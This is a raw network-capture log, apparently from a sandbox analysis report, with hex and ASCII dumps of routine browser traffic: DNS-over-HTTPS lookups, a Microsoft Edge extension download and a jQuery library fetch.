                                2024-05-27 06:42:40 UTC1390INData Raw: fb a8 8e d9 d8 0a f6 55 37 bd 46 89 f1 28 7d f9 99 1b 38 d5 99 eb 90 c0 01 e6 b3 68 45 a7 fb 8e 25 f6 96 53 af cd 39 11 dd d8 94 07 9d e0 47 40 00 fb 40 ed e0 0a 6e d7 bc 81 88 d0 31 c6 9e 7d 23 5d ad b8 0b cd 84 21 bb ea e0 07 d6 b5 b9 c4 be f4 56 b2 57 03 cd 1b 28 ca c6 39 97 7c 77 22 14 9b b1 85 37 a2 13 2f 19 71 be 88 4e fd b8 dd d5 88 ef 1e cc c8 00 69 9f 40 62 95 20 3f 3c 2f b1 bf 6b be 7b ba 52 77 4a df 9d 04 7c b7 44 3b 68 e6 41 cf 0e 78 4c 3a 14 11 57 eb 10 6d ef df fb 8d c4 1b ae 99 25 be d7 5f 9b f5 c1 23 f4 8e 8f ff 83 bf 91 02 87 ae ad 7f 06 76 47 99 3a 06 77 c7 97 d8 d8 f9 85 42 3c 9e 59 9b c0 78 a6 b0 b5 39 1f b7 e1 c1 c9 12 22 41 49 d1 05 ab a1 11 33 5c d4 fd b2 5b e9 b9 0a eb fe 35 b8 c5 cd bb 1d ba b6 9b eb f1 e5 5e 9d 14 50 9d 29 7c 07
                                Data Ascii: U7F(}8hE%S9G@@n1}#]!VW(9|w"7/qNi@b ?</k{RwJ|D;hAxL:Wm%_#vG:wB<Yx9"AI3\[5^P)|
                                2024-05-27 06:42:40 UTC1390INData Raw: 61 05 63 96 c6 df d7 32 ca 8e a9 3f ea e6 7a ec fe 79 de f0 ed 4f cf 19 fe eb b3 83 f4 d8 98 9a aa fd d7 59 c1 5a 6b 8a 7d cb f5 3c 08 3e de 0b be 53 99 69 df 34 bb 6b d1 d9 3a 7f 4d 5f 85 57 7f e6 5e 7b fe 9f cf 5a 42 95 3d 1a be 99 7e 9f 45 3c 35 a5 75 6a 8e df ff ff 9e 5b 43 af b7 af 02 ee 4c 5d 73 73 ce f5 fa 6e 2e d3 5b fc c7 a1 c9 7c bc 7d 56 d7 1f 7f fd db 3f 7e d4 55 2e ab cf ef b3 93 ed f9 fb dc e4 bd 2a ae e3 e5 b3 fa f1 fb 7f fd 18 3e 2f 63 55 8e d5 1f e7 29 f5 fa 2d bf c7 9a d0 f9 08 d0 39 d8 fd fb d5 f4 5b 82 57 7b d3 f3 32 c8 4f 6f 1f f5 e7 38 57 d9 f3 a4 d8 46 a7 c1 90 7d 19 8f eb 2d 1e f6 d0 7f 9e a4 b5 6d 9f 4f 53 36 1c 8b 07 7e 79 7d d3 c6 c5 7e 1d e3 5f c7 f2 7a 79 7e 09 b6 cd 65 53 7b ea 78 2b d0 e7 69 12 d1 36 42 e2 54 dd ba e4 27 bc
                                Data Ascii: ac2?zyOYZk}<>Si4k:M_W^{ZB=~E<5uj[CL]ssn.[|}V?~U.*>/cU)-9[W{2Oo8WF}-mOS6~y}~_zy~eS{x+i6BT'
                                2024-05-27 06:42:40 UTC1390INData Raw: 8a 7d fc d1 ef 84 e0 7f 01 6b 7a 31 12 f3 27 6f 38 59 43 8c 64 cb 18 dc c6 85 58 ce 69 15 22 8c 22 d1 6e 67 ab b5 b5 ba c8 53 a8 36 c8 7e 1e b1 30 83 7a 92 d7 23 e3 26 d8 91 a5 24 6a c4 0f 1d 58 73 4d b9 37 45 93 5b a0 fc 2a 32 7b c8 f6 df c8 90 e9 79 38 3d 3e 39 23 67 95 f6 93 7f ed ed bc b7 b8 7d 05 76 1d e6 15 be af 7d bf 43 2d da 08 97 b8 93 f4 43 7d 53 9e e9 b6 bc 9b a8 97 7e e8 5b c4 5e cd 7a 2e 7c 4c a1 20 61 04 2c 8d bd 44 5b 49 52 19 66 db 22 61 83 34 ce e9 92 e9 4a ed b2 dc df 5f 8c 51 7c 1c 7c 02 50 4b 07 08 bc e4 0d fd 60 01 00 00 c7 02 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 75 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 b7 2b 4e 66 0a 00 20 00
                                Data Ascii: }kz1'o8YCdXi""ngS6~0z#&$jXsM7E[*2{y8=>9#g}v}C-C}S~[^z.|L a,D[IRf"a4J_Q||PK`PK!-_locales/ru/messages.jsonUT+Nf
                                2024-05-27 06:42:40 UTC1390INData Raw: fa 75 04 9a fd ce 16 cf e2 50 2f af 4b 00 76 41 91 9c 94 fc 79 06 d8 9b 7c 4a c7 4b 0d dd 2f 1f fe 02 50 4b 07 08 25 80 f1 7a ad 01 00 00 90 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 74 65 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 b7 2b 4e 66 0a 00 20 00 00 00 00 00 01 00 18 00 80 95 99 be 6d ac da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cd 56 cb 6e db 30 10 bc f7 2b 08 9d 8d 80 0f c9 72 72 2e d0 9f c8 85 96 56 a9 01 59 12 2c 07 0d 10 e4 df 5b 91 54 39 34 c5 d8 6a 82 a0 17 89 c0 92 cb 99 d9 59 92 af 59 75 22 7d a6 8e 7e 65 0f af d9 91 c6 51 3f 51 f6 90 3d 3e f3 4a 14 d3 37 d7 d3 57 e6 66 5c db 31 33 bf ed f4 55 64 c6 3b 08 9b b1 6a 18 e4 30 01 c5
                                Data Ascii: uP/KvAy|JK/PK%zPK!-_locales/te/messages.jsonUT+Nf mVn0+rr.VY,[T94jYYu"}~eQ?Q=>J7Wf\13Ud;j0
                                2024-05-27 06:42:40 UTC1390INData Raw: 2e 6a 73 6f 6e 55 54 05 00 01 b7 2b 4e 66 0a 00 20 00 00 00 00 00 01 00 18 00 80 95 99 be 6d ac da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a5 53 4b 8e db 30 0c dd f7 14 85 d7 5d 48 b2 48 51 73 81 5e c2 1b 7d a8 69 00 c7 0e 92 18 2d 30 98 bb 57 94 c7 6d 9c 04 9d 45 37 01 41 8b 8f 7c 9f bc 75 e9 cc e1 ca 13 ff ec 5e de ba 23 5f 2e e1 95 bb 97 6e 58 80 4b 18 16 17 52 1c 16 84 a8 86 c5 93 82 da 41 e6 ee fd 5b c7 bf 4e 63 98 c2 f5 30 4f 73 29 e3 61 e2 7c b8 84 38 72 be 47 42 15 68 58 08 01 1a 52 aa 48 c8 a6 22 e5 2c 1b 4c aa d8 a8 6d dd d3 2b 55 fb e0 a9 fe 92 27 5d 6b 67 ea 2c 26 5f 3b e8 94 1f 16 cb 52 93 c2 22 08 b1 d6 5e 99 fe 0f 1a 92 95 8d 49 76 a5 a4 e5 bd aa c8 b6 38 79 0f 82 56 b7 a4 ef f3 fc 3a f2 57 39 88 9c 3c 2a d8 3e e4 61 29 45 d5 13
                                Data Ascii: .jsonUT+Nf mSK0]HHQs^}i-0WmE7A|u^#_.nXKRA[Nc0Os)a|8rGBhXRH",Lm+U']kg,&_;R"^Iv8yV:W9<*>a)E
                                2024-05-27 06:42:40 UTC1390INData Raw: fc 51 7a fb ef cc 28 fc 6f 64 2d 8c e8 d5 0e 1b a6 e6 66 72 7f 14 0c 1d 2c a6 71 24 18 a5 f3 bd b7 18 d9 d8 bd 77 83 7d 9b 5a af d1 fc ec eb 50 0a b8 b4 e4 66 b0 ee 02 76 d6 99 6d e6 d6 aa be 2e 5b a7 f6 2f 75 aa a1 99 32 2d 9c ed a7 ee e9 c4 95 91 42 d6 16 7a 2a 9e 79 a9 c0 21 bb c2 15 1e cf 64 35 d0 9c 84 21 e7 76 7f 37 79 a7 ef 64 97 83 99 5b 6b ba 2a 71 9d 55 e5 31 61 0a a3 a4 37 cc 87 60 57 e7 47 17 b9 68 05 46 89 25 0e c4 31 db a9 35 78 77 7e 62 fe 70 ed f2 1c f6 f4 b1 3a 9d e3 60 c6 bd dd 9b 40 2a ad df 5a 3f b4 f4 a5 f2 5c f3 c3 23 b9 5a c1 3b 8f da ec be 7e f8 05 50 4b 07 08 61 32 71 18 9d 01 00 00 86 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6f 2f 6d 65 73 73
                                Data Ascii: Qz(od-fr,q$w}ZPfvm.[/u2-Bz*y!d5!v7yd[k*qU1a7`WGhF%15xw~bp:`@*Z?\#Z;~PKa2qPK!-_locales/ko/mess
                                2024-05-27 06:42:40 UTC1390INData Raw: 57 a4 95 c9 3d 62 d3 cd d9 77 94 16 5a 57 63 d3 2e 1c f3 d9 6b 0d 87 3d 8e 30 c9 09 32 2d f8 bc 05 0e 45 5d 03 d9 54 b0 53 4f 47 b7 f5 0d 71 65 30 c2 5d 35 07 ea 1c 9d fa e3 70 ba 10 2a 34 7c 06 ee 50 c2 5e 74 6b fa a9 31 0e e3 d3 f8 db 75 e3 f9 0d 65 1a f6 7f 7f 24 04 83 44 ca 17 85 2e 66 85 60 da da ab e1 bb 42 dc b3 e9 c8 af 6f 84 2a bd cf c5 48 06 50 53 e2 73 f9 f0 00 d4 17 47 43 7c 6d 2d c8 cd 4f 9a c4 aa 0d c5 d8 b2 09 06 87 8c f7 ab 17 df cb b7 57 50 4b 07 08 b6 e3 ef 9c 57 02 00 00 1e 0b 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 66 69 6c 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 b7 2b 4e 66 0a 00 20 00 00 00 00 00 01 00 18 00 80 95 99 be 6d ac da 01 00
                                Data Ascii: W=bwZWc.k=02-E]TSOGqe0]5p*4|P^tk1ue$D.f`Bo*HPSsGC|m-OWPKWPK!-_locales/fil/messages.jsonUT+Nf m


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.449760172.64.41.34435780C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:40 UTC245OUTPOST /dns-query HTTP/1.1
                                Host: chrome.cloudflare-dns.com
                                Connection: keep-alive
                                Content-Length: 128
                                Accept: application/dns-message
                                Accept-Language: *
                                User-Agent: Chrome
                                Accept-Encoding: identity
                                Content-Type: application/dns-message
                                2024-05-27 06:42:40 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: wwwgstaticcom)TP
                                2024-05-27 06:42:40 UTC247INHTTP/1.1 200 OK
                                Server: cloudflare
                                Date: Mon, 27 May 2024 06:42:40 GMT
                                Content-Type: application/dns-message
                                Connection: close
                                Access-Control-Allow-Origin: *
                                Content-Length: 468
                                CF-RAY: 88a406bd2f404392-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-27 06:42:40 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 03 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: wwwgstaticcom(c)


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.449761172.64.41.34435780C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:41 UTC245OUTPOST /dns-query HTTP/1.1
                                Host: chrome.cloudflare-dns.com
                                Connection: keep-alive
                                Content-Length: 128
                                Accept: application/dns-message
                                Accept-Language: *
                                User-Agent: Chrome
                                Accept-Encoding: identity
                                Content-Type: application/dns-message
                                2024-05-27 06:42:41 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: wwwgstaticcom)TP
                                2024-05-27 06:42:41 UTC247INHTTP/1.1 200 OK
                                Server: cloudflare
                                Date: Mon, 27 May 2024 06:42:41 GMT
                                Content-Type: application/dns-message
                                Connection: close
                                Access-Control-Allow-Origin: *
                                Content-Length: 468
                                CF-RAY: 88a406c02ab143c8-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-27 06:42:41 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d3 00 04 8e fb 28 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: wwwgstaticcom()


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.44976623.43.85.1334435780C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:42 UTC612OUTGET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1717396960&P2=404&P3=2&P4=ULNdjLkH43bttteLUmqiTRcCoRkq8geCYsmFuW120olMpAB1hZlGSD7a5N19YXoBdeESSnvSJycFdjgdcmlLdA%3d%3d HTTP/1.1
                                Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                Connection: keep-alive
                                MS-CV: zAvZ1Ve+Lk5FaTZ3hfzK3d
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: empty
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                2024-05-27 06:42:42 UTC1249INHTTP/1.1 200 OK
                                Content-Type: application/x-chrome-extension
                                Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
                                Accept-Ranges: bytes
                                ETag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                Server: Microsoft-IIS/10.0
                                X-AspNetMvc-Version: 5.3
                                MS-CorrelationId: b8fd5aba-165f-4514-b64d-af0793860a7e
                                MS-RequestId: 4521fac2-255a-4d69-8836-c2607fd66b03
                                MS-CV: jeXOiG7+zK6E3KImhSgwIJ.0
                                X-AspNet-Version: 4.0.30319
                                X-Powered-By: ASP.NET
                                X-Powered-By: ARR/3.0
                                X-Powered-By: ASP.NET
                                Content-Length: 11185
                                Cache-Control: public, max-age=86376
                                Date: Mon, 27 May 2024 06:42:42 GMT
                                Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
                                Connection: close
                                Akamai-Request-BC: [a=23.216.152.197,b=2097997444,c=g,n=US_NJ_EDISON,o=20940],[c=c,n=US_NJ_EDISON,o=20940]
                                MSREGION:
                                X-CCC:
                                X-CID: 3
                                Akamai-GRN: 0.c598d817.1716792162.7d0ce684
                                Access-Control-Max-Age: 86400
                                Access-Control-Allow-Credentials: true
                                Access-Control-Expose-Headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC
                                Access-Control-Allow-Headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
                                Access-Control-Allow-Methods: GET,POST,OPTIONS
                                Access-Control-Allow-Origin: *
                                2024-05-27 06:42:42 UTC11185INData Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20
                                Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.449788151.101.130.1374437196C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:45 UTC307OUTGET /jquery-3.6.3.min.js HTTP/1.1
                                Accept: application/javascript, */*;q=0.8
                                Referer: https://www.msn.com/?ocid=iehp
                                Accept-Language: en-CH
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Accept-Encoding: gzip, deflate
                                Host: code.jquery.com
                                Connection: Keep-Alive
                                2024-05-27 06:42:45 UTC567INHTTP/1.1 200 OK
                                Connection: close
                                Content-Length: 89947
                                Server: nginx
                                Content-Type: application/javascript; charset=utf-8
                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                ETag: "28feccc0-15f5b"
                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                Access-Control-Allow-Origin: *
                                Via: 1.1 varnish, 1.1 varnish
                                Accept-Ranges: bytes
                                Age: 413904
                                Date: Mon, 27 May 2024 06:42:45 GMT
                                X-Served-By: cache-lga13623-LGA, cache-nyc-kteb1890092-NYC
                                X-Cache: HIT, MISS
                                X-Cache-Hits: 61, 0
                                X-Timer: S1716792165.378029,VS0,VE3
                                Vary: Accept-Encoding
                                2024-05-27 06:42:45 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 33 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                Data Ascii: /*! jQuery v3.6.3 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                2024-05-27 06:42:45 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 45 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 45 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 45 2e 6d 61 70 28 74 68 69 73 2c 66
                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=E.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return E.each(this,e)},map:function(n){return this.pushStack(E.map(this,f
                                2024-05-27 06:42:45 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 79 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=y.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                2024-05-27 06:42:45 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                2024-05-27 06:42:45 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                2024-05-27 06:42:45 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 76 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 45 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 69 66 28 64 2e 63 73 73 53 75 70 70 6f 72 74 73 53 65 6c 65 63 74 6f 72 26 26 21 43 53 53 2e 73 75 70 70 6f 72 74 73 28 22 73 65 